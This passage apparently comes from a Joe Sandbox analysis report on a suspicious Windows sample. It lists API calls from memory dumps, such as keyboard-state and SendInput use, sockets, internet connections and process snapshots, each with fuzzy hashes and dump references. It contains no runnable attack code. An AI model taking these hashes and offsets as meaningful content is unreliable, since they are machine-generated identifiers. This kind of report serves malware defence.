                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                • Opcode ID: 5cdd4f539f832503e9fddd590cb47373c4d3cd07f944651d04350e4aa725a543
                                                                                                                                                                • Instruction ID: 15026209c480d9ecb3a6268cf8d7bceb0cae6a4af1792a760cc0470c9b51e478
                                                                                                                                                                • Opcode Fuzzy Hash: 5cdd4f539f832503e9fddd590cb47373c4d3cd07f944651d04350e4aa725a543
                                                                                                                                                                • Instruction Fuzzy Hash: 6B519D71114311AFD311EF20D882FABB7E8EF95740F00492DF585972A2EB70EA14CB92
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00339E88
                                                                                                                                                                • ScreenToClient.USER32(00000002,00000002), ref: 00339EBB
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00339F28
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                • Opcode ID: 0b1f7b7010f1cf78c2e7aa67e1a161e0bec35377614a9f815f24e7358e52036b
                                                                                                                                                                • Instruction ID: 0bc89ed79b0cddedb4cd6e1a63d05df1caeae189306cc4a3066eb4fdb143af1e
                                                                                                                                                                • Opcode Fuzzy Hash: 0b1f7b7010f1cf78c2e7aa67e1a161e0bec35377614a9f815f24e7358e52036b
                                                                                                                                                                • Instruction Fuzzy Hash: 70514E34A00209EFCB26DF58C884AAE7BB5FF44321F11815AF919DB2A0D770AD91CF90
                                                                                                                                                                APIs
                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 003270BC
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 003270CC
                                                                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00327130
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0032713C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$socket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1881357543-0
                                                                                                                                                                • Opcode ID: 8bab019364b2a2f787c10848e77c23fc572dd9f4a734c7d616bb660c9de30989
                                                                                                                                                                • Instruction ID: 41a817ae264259f3c5969200b4e8503b5c5f74b5ff2ea8ab8fca75f35302122a
                                                                                                                                                                • Opcode Fuzzy Hash: 8bab019364b2a2f787c10848e77c23fc572dd9f4a734c7d616bb660c9de30989
                                                                                                                                                                • Instruction Fuzzy Hash: BB419D757502106FEB25BF24DC86FAA77A8AF04B54F04C458FA59AF3C3DA70AD108B91
                                                                                                                                                                APIs
                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0031BEE1
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0031BF07
                                                                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0031BF2C
                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0031BF58
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                • Opcode ID: 55c2b2a36508c1b2306aea2184110ea2522716bd3ffe780f731c371d40c95e2c
                                                                                                                                                                • Instruction ID: 2cb6fb06a5f23feeb8a7319b44dc7993de1dce425d721fc79a5756b7d2639fe8
                                                                                                                                                                • Opcode Fuzzy Hash: 55c2b2a36508c1b2306aea2184110ea2522716bd3ffe780f731c371d40c95e2c
                                                                                                                                                                • Instruction Fuzzy Hash: 37411439600A11DFCB16AF14C485A99BBF1EF49364B09C488E9499B362CB30FD52CF91
                                                                                                                                                                APIs
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00338F03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InvalidateRect
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 634782764-0
                                                                                                                                                                • Opcode ID: 5577b958e5e1991af41464ef7b96b15a6926aa8b0a99f0cd7b8116c3b01ec2b2
                                                                                                                                                                • Instruction ID: 0ac6477f43ca952a59fe61f80f7e1fb59f464f9739ca272450ad346da1229b68
                                                                                                                                                                • Opcode Fuzzy Hash: 5577b958e5e1991af41464ef7b96b15a6926aa8b0a99f0cd7b8116c3b01ec2b2
                                                                                                                                                                • Instruction Fuzzy Hash: 0531CF34605308BFEF279B18ECC9FA837AAEB06360F254901FA55D65A1CF74E9908A51
                                                                                                                                                                APIs
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0033B1D2
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0033B248
                                                                                                                                                                • PtInRect.USER32(?,?,0033C6BC), ref: 0033B258
                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 0033B2C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                                • Opcode ID: 2ad2106c77c472a16ab0ac6a56133b07e7f9f4cb3ca4d842ca03a7e5dbea01b4
                                                                                                                                                                • Instruction ID: cbc962b13db64e73091efb5a9161b895c987550b24b79d6bcbf37177100aeb90
                                                                                                                                                                • Opcode Fuzzy Hash: 2ad2106c77c472a16ab0ac6a56133b07e7f9f4cb3ca4d842ca03a7e5dbea01b4
                                                                                                                                                                • Instruction Fuzzy Hash: 90417F30A04115EFCB22CF58C8C5A9EB7F9FF49350F194AA9EA18DB251D730A941CF51
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00311326
                                                                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00311342
                                                                                                                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003113A8
                                                                                                                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003113FA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                                • Opcode ID: b51550793afe773656b9d54d4660f0b3a1602e31ee58492a4a6b1e60bec83587
                                                                                                                                                                • Instruction ID: b8ff18118c6dd03ac805a8e6dd679538133c4661a2f64f8e206fe6551cbf4052
                                                                                                                                                                • Opcode Fuzzy Hash: b51550793afe773656b9d54d4660f0b3a1602e31ee58492a4a6b1e60bec83587
                                                                                                                                                                • Instruction Fuzzy Hash: 84317C34A44208AEFF3F86258C05BFEBBB9AB4D310F04460AE6A0569D8D3749DC19B55
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyboardState.USER32(?,763AA2E0,?,00008000), ref: 00311465
                                                                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00311481
                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 003114E0
                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,763AA2E0,?,00008000), ref: 00311532
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                                • Opcode ID: 681a9e49c65d43230e57c5e91d9c672cb4a1712a3de7650cabc6cbeef78f8af0
                                                                                                                                                                • Instruction ID: dd07a95493dd20d742aec2f5ec7bd151aa2939ac8902d839cc4cf567da54c87f
                                                                                                                                                                • Opcode Fuzzy Hash: 681a9e49c65d43230e57c5e91d9c672cb4a1712a3de7650cabc6cbeef78f8af0
                                                                                                                                                                • Instruction Fuzzy Hash: 55316030A442185EFF3F8B668C047FEBB7AAB8E710F05431AE681561D1CB7899D19B61
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0033553F
                                                                                                                                                                  • Part of subcall function 00313B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00313B4E
                                                                                                                                                                  • Part of subcall function 00313B34: GetCurrentThreadId.KERNEL32 ref: 00313B55
                                                                                                                                                                  • Part of subcall function 00313B34: AttachThreadInput.USER32(00000000,?,003155C0), ref: 00313B5C
                                                                                                                                                                • GetCaretPos.USER32(?), ref: 00335550
                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 0033558B
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00335591
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                • Opcode ID: 86d227e44814c3aefcfa735b17ac9dadf20c0e44c1bc43b2d264333abdc91687
                                                                                                                                                                • Instruction ID: cfee2d9c94e03f06abc517611f3d3b7ec722502234420661730f7a3a7910215e
                                                                                                                                                                • Opcode Fuzzy Hash: 86d227e44814c3aefcfa735b17ac9dadf20c0e44c1bc43b2d264333abdc91687
                                                                                                                                                                • Instruction Fuzzy Hash: 54314B71A00108AFDB05EFB5C8819EEB7FDEF98304F10446AE501E7242EA71AE508FA0
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0030BD9D
                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0030BDBA
                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0030BDF2
                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0030BE18
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2796087071-0
                                                                                                                                                                • Opcode ID: 6f1cc8ff00efa5f8b450409a912d1033431e68bc2b61f3ea5d9eebcbf63f6f9a
                                                                                                                                                                • Instruction ID: 4de5302ac55cfac677df7930d01b1820ab3fd67a91dc27775fb1cd6df1d6422a
                                                                                                                                                                • Opcode Fuzzy Hash: 6f1cc8ff00efa5f8b450409a912d1033431e68bc2b61f3ea5d9eebcbf63f6f9a
                                                                                                                                                                • Instruction Fuzzy Hash: 30210432205204BAEB265B39EC59EBBBB9CDF45760F11802AFD09DA1D1EF61DC50D6A0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0033CB7A
                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002EBCEC,?,?,?,?,?), ref: 0033CB8F
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0033CBDC
                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002EBCEC,?,?,?), ref: 0033CC16
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2864067406-0
                                                                                                                                                                • Opcode ID: f514979164c464d306473902edadf6334937c1e2c1954c0aaa22f6096840f1af
                                                                                                                                                                • Instruction ID: 87176c0e45aecca3e46547d9341c91aaa1022134c7b49e4c0ffc73fdeaffb281
                                                                                                                                                                • Opcode Fuzzy Hash: f514979164c464d306473902edadf6334937c1e2c1954c0aaa22f6096840f1af
                                                                                                                                                                • Instruction Fuzzy Hash: 2731D535610158EFCB268F94CC89EFABBB9EB0A310F044199F909AB261C7316D50DF60
                                                                                                                                                                APIs
                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00321E6F
                                                                                                                                                                  • Part of subcall function 00321EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00321F18
                                                                                                                                                                  • Part of subcall function 00321EF9: InternetCloseHandle.WININET(00000000), ref: 00321FB5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1463438336-0
                                                                                                                                                                • Opcode ID: 4e5bca3053d45033531d39d9a5cb7054d63142333f2786169709efc2848a6330
                                                                                                                                                                • Instruction ID: f4fee64a8dc8faecce4c094e2450733787115f500e87b06b44914993976e704f
                                                                                                                                                                • Opcode Fuzzy Hash: 4e5bca3053d45033531d39d9a5cb7054d63142333f2786169709efc2848a6330
                                                                                                                                                                • Instruction Fuzzy Hash: 8B21D135200615BFDB179F60ED00FBBBBAEFF94700F01401AFE019AA50DB71A8119BA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00342C4C), ref: 00313F57
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00313F66
                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00313F75
                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00342C4C), ref: 00313FD2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2267087916-0
                                                                                                                                                                • Opcode ID: 3ea66cf4c9360a51cdd734f3c431b5665509e8871e717b0673fa5e2b734df9fa
                                                                                                                                                                • Instruction ID: 34d63f93a4fe24d7a39143616a90daab2cd3ada02772fbf74d2347a2b7cbc67b
                                                                                                                                                                • Opcode Fuzzy Hash: 3ea66cf4c9360a51cdd734f3c431b5665509e8871e717b0673fa5e2b734df9fa
                                                                                                                                                                • Instruction Fuzzy Hash: FC21A3749082019F8709DF28C8819AAB7F8FE5A364F104B1DF495C72A2DB30DA97CB42
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 003363BD
                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003363D7
                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003363E5
                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003363F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                • Opcode ID: c87bb47a984e7fcb44efa47b4115057d45686698844f8356beb8a76100738c8a
                                                                                                                                                                • Instruction ID: e3a8dfaa299a930b2f29a2821968686169a8e4832e2c26c2caba147afe41adc0
                                                                                                                                                                • Opcode Fuzzy Hash: c87bb47a984e7fcb44efa47b4115057d45686698844f8356beb8a76100738c8a
                                                                                                                                                                • Instruction Fuzzy Hash: A711AF35315524AFD706AB24DC95FBA779DEF46320F148218FA16CB2E2CB74AD008B94
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0030E46F,?,?,?,0030F262,00000000,000000EF,00000119,?,?), ref: 0030F867
                                                                                                                                                                  • Part of subcall function 0030F858: lstrcpyW.KERNEL32(00000000,?,?,0030E46F,?,?,?,0030F262,00000000,000000EF,00000119,?,?,00000000), ref: 0030F88D
                                                                                                                                                                  • Part of subcall function 0030F858: lstrcmpiW.KERNEL32(00000000,?,0030E46F,?,?,?,0030F262,00000000,000000EF,00000119,?,?), ref: 0030F8BE
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0030F262,00000000,000000EF,00000119,?,?,00000000), ref: 0030E488
                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,0030F262,00000000,000000EF,00000119,?,?,00000000), ref: 0030E4AE
                                                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0030F262,00000000,000000EF,00000119,?,?,00000000), ref: 0030E4E2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                • String ID: cdecl
